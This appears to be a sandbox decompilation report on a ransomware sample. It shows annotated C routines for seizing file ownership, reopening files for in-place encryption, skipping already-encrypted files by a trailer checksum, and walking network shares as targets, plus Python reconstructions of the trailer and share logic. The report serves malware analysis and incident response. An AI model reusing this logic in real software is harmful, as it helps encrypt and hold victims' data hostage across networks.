            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 100%
            			E009B6D7C() {
            				char _v6;
            				char _v20;
            				char _v22;
            				char _v36;
            				char _v40;
            				char _v56;
            				char _v59;
            				char _v76;
            				char _v80;
            				char _v100;
            				char _v103;
            				char _v124;
            				intOrPtr _t21;
            				_Unknown_base(*)()* _t51;
            				char _t54;
            
            				_t54 = 0;
            				do {
            					_t21 = E009B70D1( *((intOrPtr*)(_t54 + 0x9c1058))); // executed
            					 *((intOrPtr*)(_t54 + 0x9c1058)) = _t21;
            					_t54 = _t54 + 4;
            				} while (_t54 < 0x2dc);
            				E009B5E33(0x9c1338, 0x5f8, 0xb, 0x15,  &_v124);
            				_v103 = 0;
            				E009B5E33(0x9c1338, 0x576, 6, 0xe,  &_v20);
            				_v6 = 0;
            				E009B5E33(0x9c1338, 0x648, 0xb, 0x14,  &_v100);
            				_v80 = 0;
            				E009B5E33(0x9c1338, 0x9fc, 0xd, 0x10,  &_v56);
            				_v40 = 0;
            				E009B5E33(0x9c1338, 0x4cd, 0xe, 0xe,  &_v36);
            				_v22 = 0;
            				E009B5E33(0x9c1338, 0x9d9, 6, 0x11,  &_v76);
            				_v59 = 0;
            				 *0x9c109c = GetProcAddress(E009B6FEC(),  &_v124);
            				 *0x9c12c0 = GetProcAddress(E009B6FEC(),  &_v20);
            				 *0x9c10fc = GetProcAddress(E009B6FEC(),  &_v100);
            				 *0x9c1320 = GetProcAddress(E009B6FEC(),  &_v56);
            				 *0x9c12d4 = GetProcAddress(E009B6FEC(),  &_v36);
            				_t51 = GetProcAddress(E009B6FEC(),  &_v76);
            				 *0x9c1084 = _t51;
            				return _t51;
            			}

            APIs
            • GetProcAddress.KERNEL32(00000000,?), ref: 009B6E3E
            • GetProcAddress.KERNEL32(00000000,?), ref: 009B6E53
            • GetProcAddress.KERNEL32(00000000,?), ref: 009B6E68
            • GetProcAddress.KERNEL32(00000000,?), ref: 009B6E7D
            • GetProcAddress.KERNEL32(00000000,?), ref: 009B6E92
            • GetProcAddress.KERNEL32(00000000,?), ref: 009B6EA7
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: AddressProc
            • String ID:
            • API String ID: 190572456-0
            • Opcode ID: e366e22bd7d90215bcb9205d5f9d814b7d5e71714c6e75f8a9fd04f4e93578b2
            • Instruction ID: 5f3dd8834902b9d82f791bb4fd23a28e5e1569d26d195e96ecb72150c5df505c
            • Opcode Fuzzy Hash: e366e22bd7d90215bcb9205d5f9d814b7d5e71714c6e75f8a9fd04f4e93578b2
            • Instruction Fuzzy Hash: 5631D471C89388BAEB11EBB09D06FEF7B6CAB09710F000416F904F7183D77596848B65
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            control_flow_graph 352 9b27a0-9b27af 353 9b2915-9b291b 352->353 354 9b27b5-9b27b9 352->354 355 9b27ba-9b27f5 call 9b5e33 354->355 359 9b2801-9b2830 call 9b5e33 355->359 360 9b27f7-9b27fb VariantClear 355->360 363 9b2834-9b2836 359->363 360->359 364 9b2909-9b290d 363->364 365 9b283c-9b284f 363->365 364->355 366 9b2913-9b2914 364->366 368 9b28ff-9b2903 VariantClear 365->368 369 9b2855-9b288d call 9b5e33 365->369 366->353 368->364 373 9b288f-9b289e call 9b2cac VariantClear 369->373 374 9b28a4-9b28dd call 9b5e33 369->374 373->374 380 9b28df-9b28ee StrToIntW VariantClear 374->380 381 9b28f4-9b28f6 374->381 380->381 381->368 382 9b28f8-9b28fe call 9b4199 381->382 382->368
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: ClearVariant
            • String ID:
            • API String ID: 1473721057-0
            • Opcode ID: 298df114b84197fa1bd45a92f8edf962765658120e70966da3cd433dd31fdd96
            • Instruction ID: 4fc471b5c3aac2eaf6c0b215f03210c87f097c57b6de35a1719e2ce1fbb74508
            • Opcode Fuzzy Hash: 298df114b84197fa1bd45a92f8edf962765658120e70966da3cd433dd31fdd96
            • Instruction Fuzzy Hash: B1414871A50209BFEB10DBA4CC89FEFB3B8FF99B14F054419F515EB191EA70A9058B60
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            (rendered graph not reproduced; basic blocks 9b5659-9b56f6, call to 9b494c, API calls GetCurrentProcess, OpenProcessToken, GetTokenInformation and SetFileSecurityW)
            C-Code - Quality: 100%
            			// Take ownership of a file the caller could not open: set the owner of _a4 to the
            			// current user's SID, then apply the DACL field of the same static security descriptor.
            			// Globals (inferred from use): 0x9c1da8 = SECURITY_DESCRIPTOR, 0x9c1dbc = process token,
            			// 0x9c1dd4 = TOKEN_USER buffer, 0x9c1dd8 = "descriptor initialised" flag.
            			E009B5659(void* __ecx, WCHAR* _a4) {
            				long _v8;
            				int _t4;
            				void* _t9;
            				int _t10;
            				void* _t11;
            				void* _t25;
            				void* _t27;
            
            				_t25 = 0;
            				_t27 =  *0x9c1dd8 - _t25; // 0x1: descriptor already initialised on an earlier call
            				if(_t27 != 0) {
            					L5:
            					_t4 = SetFileSecurityW(_a4, 1, 0x9c1da8); // 1 = OWNER_SECURITY_INFORMATION; executed
            					if(_t4 != 0) {
            						_t4 = SetFileSecurityW(_a4, 4, 0x9c1da8); // 4 = DACL_SECURITY_INFORMATION; executed
            						_t25 = (_t4 != 0) ? 1 : _t25; // success only when both calls succeed
            					}
            					L7:
            					return _t25;
            				}
            				if(OpenProcessToken(GetCurrentProcess(), 8, 0x9c1dbc) == 0) { // 8 = TOKEN_QUERY
            					goto L7;
            				}
            				_t9 = E009B494C(0x200); // heap allocation wrapper (HeapCreate/GetProcessHeap, see APIs)
            				 *0x9c1dd4 = _t9;
            				if(_t9 == 0) {
            					goto L7;
            				}
            				_t10 = GetTokenInformation( *0x9c1dbc, 1, _t9, 0x200,  &_v8); // 1 = TokenUser; executed
            				if(_t10 == 0) {
            					goto L7;
            				}
            				_t11 =  *0x9c1dd4; // 0x2b56008
            				0x9c1da8->Revision = 1; // SECURITY_DESCRIPTOR_REVISION
            				 *0x9c1dd8 = 1;
            				 *0x9c1dac =  *_t11; // SECURITY_DESCRIPTOR.Owner = TOKEN_USER.User.Sid
            				goto L5;
            			}


            APIs
            • GetCurrentProcess.KERNEL32(?,?,?,?,?,009B2D0D,?), ref: 009B566D
            • OpenProcessToken.ADVAPI32(00000000,00000008,009C1DBC,?,?,?,?,?,009B2D0D,?), ref: 009B567B
              • Part of subcall function 009B494C: HeapCreate.KERNELBASE(00000000,00100000,00000000,?,009B1C68,?,?,009B150F), ref: 009B4961
              • Part of subcall function 009B494C: GetProcessHeap.KERNEL32(?,009B1C68,?,?,009B150F), ref: 009B4970
            • GetTokenInformation.KERNELBASE(00000001,00000000,00000200,?,?,?,?,?,?,009B2D0D,?), ref: 009B56A7
            • SetFileSecurityW.KERNELBASE(?,00000001,009C1DA8,?,?,?,?,?,009B2D0D,?), ref: 009B56D3
            • SetFileSecurityW.KERNELBASE(?,00000004,009C1DA8,?,?,?,?,?,009B2D0D,?), ref: 009B56E3
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: Process$FileHeapSecurityToken$CreateCurrentInformationOpen
            • String ID:
            • API String ID: 360669253-0
            • Opcode ID: bfc49b22f4b83e92bbd854b3484567619da4f0f5f23bb9accda82b78b96d986e
            • Instruction ID: af3347f09665253dfacada8c32c577bc8f2f7e4de04b97cab4754faa88ded1d9
            • Opcode Fuzzy Hash: bfc49b22f4b83e92bbd854b3484567619da4f0f5f23bb9accda82b78b96d986e
            • Instruction Fuzzy Hash: A8116571F18204AFE7209F66ED44FA77BACEB46B61B45402DF506C25A2DA309C50EB68
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            (rendered graph not reproduced; basic blocks 9b2ed8-9b3076, calls to 9b7895, 9b7540, 9b78d4, 9b78bb, 9b4bee, 9b69b3, 9b575c, 9b75bb, 9b7554, 9b5659, 9b5a77 and 9b3077, API calls RtlGetLastWin32Error, GetFileAttributesW and SetFileAttributesW)
            C-Code - Quality: 69%
            			// Prepare one file for encryption. _a8 = path, _a12:_a16 = file size (low:high DWORD),
            			// _a4 is handed to the context allocator E009B7540 and its release routine E009B7554.
            			// Returns the per-file context (file reopened read/write) or 0 to skip the file.
            			E009B2ED8(signed int __edx, void* __eflags, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
            				signed int _v8;
            				intOrPtr _v24;
            				char _v64;
            				char _v240;
            				void* __ebx;
            				void* __esi;
            				void* _t26;
            				void* _t28;
            				long _t29;
            				void* _t34;
            				long _t35;
            				void* _t37;
            				void* _t38;
            				signed char _t41;
            				int _t42;
            				signed int _t47;
            				void* _t50;
            				intOrPtr _t53;
            				WCHAR* _t54;
            				signed int _t57;
            				signed int _t66;
            				signed int _t68;
            				void* _t71;
            				void* _t72;
            				intOrPtr* _t73;
            				intOrPtr _t76;
            				intOrPtr _t78;
            
            				_t65 = __edx;
            				_t68 = 1;
            				_t26 = E009B7895(_a8, 0x80000000, 1, 3, 0); // CreateFileW wrapper (see APIs): GENERIC_READ, FILE_SHARE_READ, OPEN_EXISTING; executed
            				_t70 = _t26;
            				_t73 = _t72 + 0x14;
            				if(_t26 == 0) {
            					L5:
            					_t78 = _a16;
            					_t53 = 0x100000; // I/O chunk size: min(file size, 1 MiB)
            					if(_t78 <= 0 && (_t78 < 0 || _a12 < 0x100000)) {
            						_t53 = _a12;
            					}
            					_t69 = _a4;
            					_t8 = _t53 + 0x160; // 0x100160: 0x160-byte per-file header followed by the chunk buffer
            					_t28 = E009B7540(_a4, _t8); // allocate the per-file context; executed
            					while(1) {
            						_t71 = _t28;
            						if(_t71 != 0) {
            							break;
            						}
            						_t29 = RtlGetLastWin32Error();
            						__eflags = _t29 - 8; // 8 = ERROR_NOT_ENOUGH_MEMORY
            						if(_t29 != 8) {
            							L15:
            							return 0; // 0 = skip this file (also reached when the trailer check below matches)
            						}
            						E009B575C(_t29, 0x64); // back-off wrapper (0x64 = 100 ms), then retry the allocation
            						_t14 = _t53 + 0x160; // 0x100160
            						_t28 = E009B7540(_t69, _t14);
            						_t73 = _t73 + 0xc;
            					}
            					_t57 = 3;
            					 *((intOrPtr*)(_t71 + 0x158)) = _t53;
            					_t54 = _a8;
            					_push(_t57);
            					 *((intOrPtr*)(_t71 + 0x154)) = 0;
            					 *((intOrPtr*)(_t71 + 0x150)) = 0;
            					_v8 = _t57;
            					_push(0);
            					while(1) {
            						_push(0xc0000000); // GENERIC_READ | GENERIC_WRITE: reopen for in-place encryption
            						_push(_a16);
            						_push(_a12);
            						_push(_t54);
            						_push(_t71); // executed
            						_t34 = E009B75BB(); // executed; up to three attempts, _v8 counts down
            						_t73 = _t73 + 0x1c;
            						_t81 = _t34;
            						if(_t34 != 0) {
            							break;
            						}
            						_t35 = RtlGetLastWin32Error();
            						_t66 = _v8;
            						_t58 = _t66;
            						_t65 = _t66 - 1;
            						_v8 = _t66 - 1;
            						__eflags = _t66;
            						if(_t66 == 0) {
            							L25:
            							E009B7554(_t69, _t71); // executed
            							_t37 = 0;
            							L31:
            							return _t37;
            						}
            						__eflags = _t35 - 5; // 5 = ERROR_ACCESS_DENIED
            						if(_t35 != 5) {
            							__eflags = _t35 - 0x20; // 0x20 = ERROR_SHARING_VIOLATION: another process holds the file
            							if(__eflags == 0) {
            								_t38 = E009B5A77(_t54, _t58, _t65, _t71, __eflags, _t54); // handles the locked path (not shown here)
            								 *_t73 = 0x3e8;
            								E009B575C(_t38); // back off 1000 ms before the next attempt
            							}
            							L28:
            							_push(3);
            							_push(0);
            							continue;
            						}
            						E009B5659(_t58, _t54); // access denied: take ownership and reset the DACL (E009B5659 above); executed
            						_t41 = GetFileAttributesW(_t54); // executed
            						__eflags = _t41 - 0xffffffff;
            						if(_t41 == 0xffffffff) {
            							goto L25;
            						}
            						__eflags = _t41 & 0x00000001; // FILE_ATTRIBUTE_READONLY
            						if((_t41 & 0x00000001) == 0) {
            							goto L28;
            						}
            						_t42 = SetFileAttributesW(_t54, 0x80); // FILE_ATTRIBUTE_NORMAL: clear read-only before retrying; executed
            						__eflags = _t42;
            						if(_t42 != 0) {
            							goto L28;
            						}
            						goto L25;
            					}
            					E009B3077(_t65, _t81, _t71); // open succeeded: finish setting up the context
            					_t37 = _t71;
            					goto L31;
            				}
            				_t76 = _a16;
            				if(_t76 > 0 || _t76 >= 0 && _a12 >= 0xe8) { // file is at least 0xe8 (232) bytes: look for the trailer appended to already-processed files
            					E009B78D4(_t70, 0xffffff18, 0xffffffff, 2); // SetFilePointer-style wrapper (inferred from its arguments): -0xe8 from FILE_END; executed
            					_t47 = E009B78BB(_t70,  &_v240, 0xe8,  &_v8); // ReadFile-style wrapper: last 0xe8 bytes into _v240, count in _v8; executed
            					_t73 = _t73 + 0x20;
            					__eflags = _t47;
            					if(_t47 == 0) {
            						L12:
            						_t68 = 0;
            					L13:
            					E009B4BEE(_t70); // handle-close wrapper; executed
            					__eflags = _t68;
            					if(_t68 == 0) {
            						goto L5;
            					}
            					_t50 = E009B69B3(0,  &_v64, 0x20); // checksum of trailer bytes 0xb0..0xcf (_v64 = _v240 + 0xb0)
            					_t73 = _t73 + 0xc;
            					__eflags = _v24 - _t50; // _v24 = trailer DWORD at offset 0xd8
            					if(_v24 != _t50) {
            						goto L5;
            					}
            					goto L15; // checksum matches: the file already carries the trailer, return 0 so it is skipped
            					}
            					__eflags = _v8 - 0xe8; // only a complete 0xe8-byte read is checked
            					if(_v8 == 0xe8) {
            						goto L13;
            					}
            					goto L12;
            				} else {
            					E009B4BEE(_t70); // handle-close wrapper (file too small to carry a trailer); executed
            					goto L5;
            				}
            			}
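The trailer test in E009B2ED8 is easy to miss in the decompilation because it hides behind stack offsets. The following is an added example written for this page, not code from the sample or from the report: it reproduces the skip test over constructed byte strings, with the two offsets (0xb0 and 0xd8 inside the 232-byte trailer) taken from the stack layout above. The hash is an assumption: E009B69B3 is called with a 0 seed over 32 bytes and CRC-32 is used as a stand-in, and the trailer layout beyond those two fields is invented for the test. A responder can turn the same test around to count files on a host that already carry the trailer.

```python
import struct
import zlib

# Offsets recovered from the stack layout of E009B2ED8: the 0xe8-byte read lands in _v240
# (ebp-0xf0); E009B69B3 is given &_v64 (ebp-0x40, i.e. trailer+0xb0) for 0x20 bytes and the
# result is compared with _v24 (ebp-0x18, i.e. the DWORD at trailer+0xd8).
TRAILER_LEN = 0xE8
CHECKED_OFF = 0xB0
CHECKED_LEN = 0x20
STORED_OFF = 0xD8


def trailer_checksum(block: bytes) -> int:
    """Assumption: E009B69B3(0, buf, 0x20) behaves like CRC-32 seeded with 0.
    The decompilation fixes only the offsets; the hash itself is a stand-in."""
    return zlib.crc32(block, 0) & 0xFFFFFFFF


def has_trailer(data: bytes) -> bool:
    """The 'already processed' test: files under 232 bytes never match (the size test
    fails before the read); otherwise the 32 bytes at 0xb0 must hash to the DWORD at 0xd8."""
    if len(data) < TRAILER_LEN:
        return False
    trailer = data[-TRAILER_LEN:]
    stored = struct.unpack_from("<I", trailer, STORED_OFF)[0]
    return stored == trailer_checksum(trailer[CHECKED_OFF:CHECKED_OFF + CHECKED_LEN])


def build_trailer(key_material: bytes) -> bytes:
    """Constructed 232-byte trailer that satisfies has_trailer(); only the two checked
    fields are meaningful, everything else is zero (not a faithful trailer layout)."""
    if len(key_material) != CHECKED_LEN:
        raise ValueError("key material must be 32 bytes")
    trailer = bytearray(TRAILER_LEN)
    trailer[CHECKED_OFF:CHECKED_OFF + CHECKED_LEN] = key_material
    struct.pack_into("<I", trailer, STORED_OFF, trailer_checksum(key_material))
    return bytes(trailer)


def triage(files: dict) -> dict:
    """Map file name -> True when the sample would skip it as already processed."""
    return {name: has_trailer(blob) for name, blob in files.items()}


def _constructed_files() -> dict:
    """Constructed inputs: too small, untouched, valid trailer, and a trailer with a bad checksum."""
    good = build_trailer(b"\xaa" * CHECKED_LEN)
    bad = bytearray(good)
    bad[STORED_OFF] ^= 0x01  # flip one bit of the stored checksum
    return {
        "small.txt": b"hello world",
        "plain.bin": bytes(range(256)) * 4,
        "report.docx": b"\x00" * 1024 + good,
        "tampered.docx": b"\x00" * 1024 + bytes(bad),
    }


CONSTRUCTED = _constructed_files()

if __name__ == "__main__":
    for name, skipped in triage(CONSTRUCTED).items():
        print(f"{name:14s} {'skip (trailer present)' if skipped else 'encrypt'}")
```

Run it as a script to see the four constructed files classified; only report.docx is treated as already processed, because tampered.docx fails the checksum and the other two are either too short or carry no trailer at all.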


            APIs
              • Part of subcall function 009B7895: CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,009B415C,00000000,40000000,00000000,00000002,00000000,00000000,00000000), ref: 009B78AB
            • RtlGetLastWin32Error.NTDLL ref: 009B2FA0
            • RtlGetLastWin32Error.NTDLL ref: 009B2FE8
            • GetFileAttributesW.KERNELBASE(?), ref: 009B3007
            • SetFileAttributesW.KERNELBASE(?,00000080), ref: 009B301C
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: File$AttributesErrorLastWin32$Create
            • String ID:
            • API String ID: 1515811453-0
            • Opcode ID: 0361ac18948398ebdd3ab62ae07e24790ec456f92517919e7b00ef1eb9770e94
            • Instruction ID: d2efa87ab4c40eaa853511fed40c1eba1fa385757a30d736101cd0d6fd04c05f
            • Opcode Fuzzy Hash: 0361ac18948398ebdd3ab62ae07e24790ec456f92517919e7b00ef1eb9770e94
            • Instruction Fuzzy Hash: 4541E371908605AAEB21EF649F86FFF737CEF84331F144629F905A6182EA749E018761
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            (rendered graph not reproduced; basic blocks 9b7a73-9b7bd4, calls to 9b494c, 9b7a73 (recursive), 9b6197, 9b5e33, 9b61f8, 9b6116, 9b766a and 9b4999, API calls WNetOpenEnumW, WNetEnumResourceW and WNetCloseEnum)
            C-Code - Quality: 98%
            			// Recursive network-share walker. _a8 = WNetOpenEnum dwScope, _a12 = parent NETRESOURCE
            			// (NULL at the top level), _a4 is passed through to the per-share worker E009B766A.
            			// Offsets below follow the 0x20-byte NETRESOURCEW: dwType +0x4, dwUsage +0xc, lpRemoteName +0x14.
            			E009B7A73(int _a4, int _a8, struct _NETRESOURCE* _a12) {
            				struct _NETRESOURCE* _v8;
            				int _v12;
            				void* _v16;
            				int _v20;
            				struct _NETRESOURCE* _v24;
            				short _v26;
            				char _v40;
            				int _t36;
            				void* _t38;
            				struct _NETRESOURCE* _t41;
            				signed int _t43;
            				struct _NETRESOURCE* _t45;
            				struct _NETRESOURCE* _t60;
            				void* _t64;
            				struct _NETRESOURCE* _t71;
            				struct _NETRESOURCE* _t72;
            				struct _NETRESOURCE** _t74;
            				void* _t76;
            
            				_t71 = _a12;
            				_t36 = WNetOpenEnumW(_a8, 0, 0, _t71,  &_v16); // dwType = RESOURCETYPE_ANY, dwUsage = 0; executed
            				if(_t36 == 0) {
            					_v12 = _v12 | 0xffffffff; // cEntries = -1: as many entries as fit
            					_v20 = 0x4000; // 16 KiB result buffer
            					_t38 = E009B494C(0x4000); // heap allocation wrapper; executed
            					_t64 = _t38;
            					__eflags = _t64;
            					if(_t64 != 0) {
            						goto L5;
            						do {
            							while(1) {
            								L5:
            								_t41 = WNetEnumResourceW(_v16,  &_v12, _t64,  &_v20); // executed; _v12 now holds the entry count
            								_v24 = _t41;
            								__eflags = _t41;
            								if(_t41 != 0) {
            									goto L21;
            								}
            								_v8 = _t41;
            								__eflags = _v12 - _t41;
            								if(_v12 <= _t41) {
            									continue;
            								}
            								_t14 = _t64 + 0x14; // 0x14: _t74 -> lpRemoteName of entry 0
            								_t74 = _t14;
            								do {
            									__eflags =  *(_t74 - 8) & 0x00000002; // dwUsage & RESOURCEUSAGE_CONTAINER
            									if(( *(_t74 - 8) & 0x00000002) == 0) {
            										goto L15;
            									}
            									__eflags = _t71;
            									if(_t71 == 0) {
            										L13:
            										_t20 = _t74 - 0x14; // 0x0: this entry's NETRESOURCE becomes the parent of the next level
            										E009B7A73(_a4, _a8, _t20); // recurse into the container; executed
            										_t76 = _t76 + 0xc;
            										L14:
            										_t41 = _v8;
            										goto L15;
            									}
            									__eflags =  *(_t71 + 0x14); // parent lpRemoteName
            									if( *(_t71 + 0x14) == 0) {
            										goto L15;
            									}
            									__eflags =  *_t74; // entry lpRemoteName
            									if( *_t74 == 0) {
            										goto L15;
            									}
            									_t19 = _t71 + 0x14; // 0x4573
            									_t60 = E009B6197( *_t19,  *_t74); // compares the parent's and the entry's remote names; 0 means no descent, so a container carrying the parent's own name is not re-entered
            									__eflags = _t60;
            									if(_t60 == 0) {
            										goto L14;
            									}
            									goto L13;
            									L15:
            									__eflags =  *((intOrPtr*)(_t74 - 0x10)) - 1; // dwType == RESOURCETYPE_DISK
            									if( *((intOrPtr*)(_t74 - 0x10)) == 1) {
            										_t72 = E009B494C(0xfffe); // path buffer
            										__eflags = _t72;
            										if(_t72 != 0) {
            											E009B5E33(0x9c1338, 0x16a, 0x10, 0xe,  &_v40); // string-decoding helper (same routine as in E009B5162): 7 WCHARs from the embedded table, a length consistent with the \\?\UNC long-path prefix
            											_v26 = 0; // terminate it
            											E009B61F8(_t72,  &_v40); // path = prefix (copy helper, inferred from use)
            											E009B6116(__eflags, _t72,  *_t74 + 2); // append lpRemoteName minus its first WCHAR (the leading backslash)
            											E009B6116(__eflags, _t72, 0x9bd2b4); // append the constant string at 0x9bd2b4
            											 *0x9c1d80 =  *0x9c1d80 & 0x00000000;
            											__eflags =  *0x9c1d80;
            											E009B766A(_t72, _a4); // process the share path (file-system worker, not shown here)
            											E009B4999(_t72); // free the path buffer
            											_t76 = _t76 + 0x38;
            										}
            										_t71 = _a12;
            										_t41 = _v8;
            									}
            									_t41 = _t41 + 1;
            									_t74 =  &(_t74[8]); // next entry: 8 DWORDs = 0x20 bytes
            									_v8 = _t41;
            									__eflags = _t41 - _v12;
            								} while (_t41 < _v12);
            								_t41 = _v24;
            								goto L21;
            							}
            							L21:
            							__eflags = _t41 - 0x103; // 0x103 = ERROR_NO_MORE_ITEMS ends the enumeration
            						} while (_t41 != 0x103);
            						E009B4999(_t64); // free the result buffer; executed
            						_t43 = WNetCloseEnum(_v16);
            						asm("sbb eax, eax");
            						_t45 =  ~_t43 + 1; // 1 when WNetCloseEnum returned NO_ERROR, else 0
            						__eflags = _t45;
            						L23:
            						return _t45;
            					}
            					WNetCloseEnum(_v16);
            					_t45 = 0;
            					goto L23;
            				}
            				return 0;
            			}
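The offsets in E009B7A73 (-0x10, -0x8 and +0x14 relative to the lpRemoteName pointer) only make sense against the NETRESOURCEW layout. The following is an added example for this page, not code from the sample or from the report: it packs a constructed WNetEnumResourceW result buffer and applies the three tests of the loop at 9b7aed to it, so the reader can see which entries would be descended into and which would be handed to the file-system worker. Assumptions, marked in the code: the decoded 7-character prefix is `\\?\UNC`, the constant at 0x9bd2b4 is a single backslash, and E009B6197 returns 0 when the two remote names are equal; the server and share names are invented.

```python
import struct

# NETRESOURCEW on 32-bit Windows: eight 4-byte fields, dwScope, dwType, dwDisplayType, dwUsage,
# lpLocalName, lpRemoteName, lpComment, lpProvider. E009B7A73 keeps a pointer to lpRemoteName
# (+0x14) and reads dwType at -0x10 and dwUsage at -0x8 relative to it.
NETRESOURCE_SIZE = 0x20
OFF_TYPE, OFF_USAGE, OFF_REMOTE = 0x04, 0x0C, 0x14
RESOURCETYPE_DISK = 1
RESOURCETYPE_PRINT = 2
RESOURCEUSAGE_CONTAINER = 2
# Assumptions (the report does not decode these strings): the 7-WCHAR prefix is the
# \\?\UNC long-path prefix and the constant at 0x9bd2b4 is a single backslash.
UNC_PREFIX = "\\\\?\\UNC"
SUFFIX = "\\"


def read_wstr(buf: bytes, offset: int) -> str:
    """NUL-terminated UTF-16LE string at offset (lp* pointers are buffer offsets in this model)."""
    end = offset
    while buf[end:end + 2] != b"\x00\x00":
        end += 2
    return buf[offset:end].decode("utf-16-le")


def parse_netresources(buf: bytes, count: int) -> list:
    """Return [(dwType, dwUsage, lpRemoteName)] for the count entries WNetEnumResourceW filled in."""
    out = []
    for i in range(count):
        base = i * NETRESOURCE_SIZE
        dw_type = struct.unpack_from("<I", buf, base + OFF_TYPE)[0]
        dw_usage = struct.unpack_from("<I", buf, base + OFF_USAGE)[0]
        remote_off = struct.unpack_from("<I", buf, base + OFF_REMOTE)[0]
        out.append((dw_type, dw_usage, read_wstr(buf, remote_off) if remote_off else ""))
    return out


def classify(buf: bytes, count: int, parent_remote=None) -> tuple:
    """Apply the three tests of the loop at 9b7aed: containers are descended into, except that
    with a parent present both names must exist and differ (assumption: E009B6197 returns 0 when
    they are equal); RESOURCETYPE_DISK entries become UNC_PREFIX + lpRemoteName[1:] + SUFFIX."""
    targets, descend = [], []
    for dw_type, dw_usage, remote in parse_netresources(buf, count):
        if dw_usage & RESOURCEUSAGE_CONTAINER:
            if parent_remote is None or (parent_remote and remote and remote != parent_remote):
                descend.append(remote)
        if dw_type == RESOURCETYPE_DISK:
            targets.append(UNC_PREFIX + remote[1:] + SUFFIX)
    return targets, descend


def build_buffer(entries: list) -> tuple:
    """Constructed test data: pack the NETRESOURCEW array, then the strings it points to."""
    records, strings = b"", b""
    str_base = len(entries) * NETRESOURCE_SIZE
    for dw_type, dw_usage, remote in entries:
        ptr = 0
        if remote:
            ptr = str_base + len(strings)
            strings += remote.encode("utf-16-le") + b"\x00\x00"
        records += struct.pack("<8I", 0, dw_type, 0, dw_usage, 0, ptr, 0, 0)
    return records + strings, len(entries)


# Constructed enumeration result below a provider container named "Microsoft Windows Network".
CONSTRUCTED = [
    (0, RESOURCEUSAGE_CONTAINER, "\\\\FILESRV01"),                         # server: descend
    (RESOURCETYPE_DISK, 0, "\\\\FILESRV01\\Finance"),                       # share: target
    (RESOURCETYPE_DISK, RESOURCEUSAGE_CONTAINER, "\\\\FILESRV01\\Public"),  # both
    (RESOURCETYPE_PRINT, 0, "\\\\FILESRV01\\HPLaser"),                      # printer: ignored
    (0, RESOURCEUSAGE_CONTAINER, "Microsoft Windows Network"),             # same as parent: guard
]

if __name__ == "__main__":
    buf, n = build_buffer(CONSTRUCTED)
    targets, descend = classify(buf, n, parent_remote="Microsoft Windows Network")
    print("encrypt:", targets)
    print("descend:", descend)
```

With the parent set, the printer entry produces nothing, the share entries yield `\\?\UNC\FILESRV01\Finance\` and `\\?\UNC\FILESRV01\Public\`, and the container whose name repeats the parent is not descended into; with no parent (the top-level call) every container is descended into.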


            APIs
            • WNetOpenEnumW.MPR(?,00000000,00000000,009B34E8,?), ref: 009B7A89
            • WNetCloseEnum.MPR(?), ref: 009B7AB7
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
